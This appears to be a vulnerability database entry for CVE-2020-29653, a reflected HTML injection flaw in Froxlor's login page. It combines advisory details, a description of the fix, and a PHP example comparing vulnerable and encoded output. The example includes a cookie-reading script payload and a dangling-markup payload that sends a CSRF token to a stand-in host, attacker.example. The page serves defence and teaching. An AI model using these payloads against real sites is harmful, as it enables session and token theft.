CVE-2020-29653
Description
Froxlor through 0.10.22 does not perform validation on user input passed in the customermail GET parameter. The value of this parameter is reflected in the login webpage, allowing the injection of arbitrary HTML tags.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| froxlor/froxlor (Packagist) | <= 0.10.22 | none recorded |
Affected products
Patches (2)
Vulnerability mechanics
Root cause
"Missing input validation on the customermail GET parameter allows arbitrary HTML/JavaScript injection into the login page output."
Attack vector
An attacker crafts a URL whose `customermail` GET parameter carries HTML and delivers it to a victim, typically by phishing. When the victim opens the URL, Froxlor's login page reflects the unvalidated value into its HTML output without encoding it for the surrounding context [CWE-79]. Because the injected markup renders in the origin of the Froxlor application, the practical impact ranges from spoofed content on the login form and dangling-markup exfiltration of page contents (the nozero.io writeup in the references characterises the bug this way; no script execution is needed for it) to, where script can be injected, session hijacking and credential theft. No authentication is required to trigger the reflection, since the login page is reachable by anyone.
Affected code
The vulnerability exists in the login page of Froxlor through version 0.10.22. The `customermail` GET parameter is reflected directly in the login webpage without sanitization. The patch adds the `voku/anti-xss` library and integrates it into the codebase via `lib/FroxlorPhpHelper.php` [patch_id=1700469].
What the fix does
The patch adds the `voku/anti-xss` library as a dependency in `composer.json` and updates `composer.lock` accordingly [patch_id=1700469]. The commit message states "update dependencies and add voku\AntiXSS" [ref_id=1]. The library provides server-side filtering that strips known-dangerous HTML constructs and script from user-supplied input before it is rendered in the login page, closing the reflected injection vector. Two caveats for operators: a filter of this kind is a denylist and complements, rather than replaces, context-aware output encoding at the point where the value is written into the page; and the advisory records no patched release version, so a deployment should be checked for the presence of the fix commit rather than assumed fixed by a version number above 0.10.22.
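The reflection described under "Attack vector" and the encoding-based fix discussed above, as an added example in PHP; this is not Froxlor's code or its patch. The login template, the function names, the `SECRET-TOKEN` placeholder and the `attacker.example` host are constructed for illustration. The vulnerable renderer concatenates the raw parameter into the page; the hardened one encodes it with `htmlspecialchars()` for its HTML context. A small helper mimics how a browser closes an unterminated `src="` attribute, which is what makes the dangling-markup variant leak page content without running any script.

```php
<?php
// Added example, not Froxlor's code. Constructed login template that reflects the
// customermail GET parameter as the advisory describes, beside a hardened version.
// The markup, function names and attacker.example host are assumptions. Requires PHP 8
// for str_contains().
declare(strict_types=1);

// Vulnerable: the raw parameter is concatenated into the response body.
function renderLoginVulnerable(string $customermail): string
{
    return '<p class="message">' . $customermail . '</p>'
        . '<form method=post action=/index.php>'
        . '<input type=hidden name=csrf value=SECRET-TOKEN>'
        . '<input type=submit value="Login">'
        . '</form>';
}

// Hardened: the parameter is HTML-encoded before it reaches the markup.
// ENT_QUOTES encodes both quote characters, so the same call is safe inside a
// double- or single-quoted attribute value as well as in text content.
function renderLoginSafe(string $customermail): string
{
    $safe = htmlspecialchars($customermail, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<p class="message">' . $safe . '</p>'
        . '<form method=post action=/index.php>'
        . '<input type=hidden name=csrf value=SECRET-TOKEN>'
        . '<input type=submit value="Login">'
        . '</form>';
}

// Approximates what a browser does with an unterminated src="... attribute: the
// attribute value runs up to the next double quote in the document. Returns the
// swallowed markup, or null when the payload did not land in the page verbatim.
function danglingCapture(string $html, string $payload): ?string
{
    $start = strpos($html, $payload);
    if ($start === false) {
        return null;
    }
    $start += strlen($payload);
    $end = strpos($html, '"', $start);
    return $end === false ? null : substr($html, $start, $end - $start);
}

// Constructed payloads. The first needs script execution; the second does not,
// which is why plain HTML injection matters even where a CSP blocks inline script.
$scriptPayload   = '<script>alert(document.cookie)</script>';
$danglingPayload = '<img src="https://attacker.example/leak?';

foreach (['vulnerable' => 'renderLoginVulnerable', 'safe' => 'renderLoginSafe'] as $label => $render) {
    $page = $render($danglingPayload);
    echo $label, ': ', $page, "\n";

    // Vulnerable output leaks everything up to the next double quote, which here
    // includes the csrf value; the safe output has the payload encoded, so nothing leaks.
    $leaked = danglingCapture($page, $danglingPayload);
    echo '  sent to attacker.example: ', $leaked ?? '(nothing, payload was encoded)', "\n";

    // Script injection check: the raw <script> tag survives only in the vulnerable page.
    $rawScript = str_contains($render($scriptPayload), $scriptPayload);
    echo '  raw <script> present: ', $rawScript ? 'yes' : 'no', "\n\n";
}
```

Run it with `php example.php`. The vulnerable branch prints the leaked fragment `</p><form method=post action=/index.php><input type=hidden name=csrf value=SECRET-TOKEN><input type=submit value=`, which a real browser would URL-encode and send as the image request; the safe branch prints nothing leaked and no raw script tag. The Froxlor patch takes the library route instead, where `voku\helper\AntiXSS::xss_clean()` strips dangerous constructs from the input; in practice both are worth having, with encoding at the output point as the primitive the template must never skip.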
Preconditions
- Input: the attacker must trick a victim into visiting a crafted URL containing malicious input in the `customermail` GET parameter.
- Network: no authentication or special network position is required; the login page is publicly accessible.
Generated on May 23, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-j739-gw6q-f4c7 (GitHub Security Advisory)
- nvd.nist.gov/vuln/detail/CVE-2020-29653 (NVD entry)
- github.com/Froxlor/Froxlor/commit/6bf5eccc2477257b6c1760a3c3784ae7e0554ce0 (fix commit)
- github.com/Froxlor/Froxlor/commits/master
- github.com/Froxlor/Froxlor/security/advisories
- nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markup (writeup)